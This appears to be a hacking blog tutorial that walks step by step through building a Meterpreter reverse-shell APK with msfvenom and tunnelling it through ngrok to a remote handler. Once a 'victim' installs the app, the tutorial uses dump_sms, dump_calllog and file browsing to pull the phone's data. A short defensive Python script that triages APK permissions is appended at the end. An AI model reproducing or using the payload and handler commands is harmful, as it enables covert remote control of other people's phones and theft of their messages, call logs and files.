Android Hacking with Metasploit
Intro : Android hacking is one of the wonderful arts of a Red Hat Hacker. It is a way to gain full access to your Android mobile. Today we will discuss how we can hack an Android device as a test.
Warning : Don’t hack anyone, with or without a purpose. Hacking is totally illegal. So let’s start.
Beginning :
Today we will hack Android 10.
Note : Today’s exploit will not work on Android 11, 12, etc.
So all we need is an Android mobile, a hacking OS (Kali, Parrot, etc.), ‘metasploit-framework’ and ‘ngrok’.
Note : Using ngrok you can perform the attack over the WAN. It helps us with port forwarding. If you use your own local IP, the exploit will work only on your own network.
Start Ngrok Server :
First, download ngrok from its website.
Tip : ngrok tcp <any_port> [I use 4444]
It will give tcp://<something>:<port>. The first part acts as the IP and the second part acts as the port in the payload we will make. It forwards that port to us (localhost:4444) on our machine.
Making Payload :
Now we have to make an Android payload with the apk extension, which we will send to the victim. We use a tool called ‘msfvenom’.
Tip : msfvenom -p android/meterpreter/reverse_tcp LHOST=<ngrok_ip> LPORT=<ngrok_port> R> android.apk
Msfconsole :
Then I start msfconsole.
We have to set some options to catch the connection when the victim downloads that app.
Tip : use /multi/handler
Tip : set payload android/meterpreter/reverse_tcp
Then we have to set LHOST to 127.0.0.1 and LPORT to 4444. Then type exploit and press Enter. It will start a reverse TCP handler to catch the reverse connection.
Tip : set LHOST 127.0.0.1
Tip : set LPORT 4444
Get Access :
Then I download the app on the mobile. This is the malicious app. Remember to allow all permissions when installing the app, or it will not work, and then tap on that application.
After a second I saw a session open in msfconsole, and we get a Meterpreter reverse connection. Booommmmm!!!!
Tip : Type ‘help’ command in meterpreter to see more.
After typing the ‘sysinfo’ command I found it is Android 10. Amazing!!!!
I type dump_sms and dump_calllog to dump everything. It saves the output in a text file. Here is a demo of an SMS present on the mobile.
At last I go to ‘sdcard’ to see all the files present on that mobile. And it is totally accurate.
Tip : pwd
Tip : cd sdcard
Tip : ls
Here I found Android, Alarm, Call, DCIM, etc., the basic files present in an Android system. Here is a demo.
So at last we get total remote access to that Android mobile. How simple! That’s how an attacker gains remote access to a mobile if you are not aware. So don’t download any third-party or unknown application on your Android. So be warned.
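The advice above can be turned into a quick check before installing an unknown app. The following is an added example, not part of the original post: it reads the text printed by ‘aapt dump permissions <apk>’ and flags an app that asks for network access together with the data this walkthrough reads (SMS, call log, shared storage). The permission-to-data mapping, the threshold of two and both sample listings are assumptions constructed for the example.

```python
import re

# Permissions matching the data read in the walkthrough above.
# This mapping and the default threshold are assumptions of this example.
DATA_ACCESS = {
    "android.permission.READ_SMS": "SMS messages (dump_sms)",
    "android.permission.READ_CALL_LOG": "call log (dump_calllog)",
    "android.permission.READ_EXTERNAL_STORAGE": "files under sdcard",
}
NETWORK = "android.permission.INTERNET"

# Accepts both "uses-permission: name='X'" and the older "uses-permission: X".
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?([\w.]+)'?")

def parse_permissions(aapt_output):
    """Return the set of permission names found in aapt's text output."""
    perms = set()
    for line in aapt_output.splitlines():
        m = PERM_RE.match(line.strip())
        if m:
            perms.add(m.group(1))
    return perms

def triage(aapt_output, threshold=2):
    """Flag apps that combine network access with several data-access permissions."""
    perms = parse_permissions(aapt_output)
    hits = sorted(DATA_ACCESS[p] for p in perms if p in DATA_ACCESS)
    suspicious = NETWORK in perms and len(hits) >= threshold
    return {"suspicious": suspicious, "data_access": hits, "total": len(perms)}

# Constructed sample: a "flashlight" app asking for far more than it needs.
SAMPLE_FLAGGED = """package: com.example.flashlight
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.READ_EXTERNAL_STORAGE'
uses-permission: name='android.permission.CAMERA'
"""

# Constructed sample: a notes app (second line uses the older aapt format).
SAMPLE_BENIGN = """package: com.example.notes
uses-permission: name='android.permission.INTERNET'
uses-permission: android.permission.READ_EXTERNAL_STORAGE
"""

if __name__ == "__main__":
    for name, sample in (("flashlight", SAMPLE_FLAGGED), ("notes", SAMPLE_BENIGN)):
        print(name, triage(sample))
```

A flagged result is a reason to look closer at where the app came from, not proof that it is malicious; legitimate messaging and backup apps request the same permissions.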
THANKS FOR READING!!
Happy Hacking~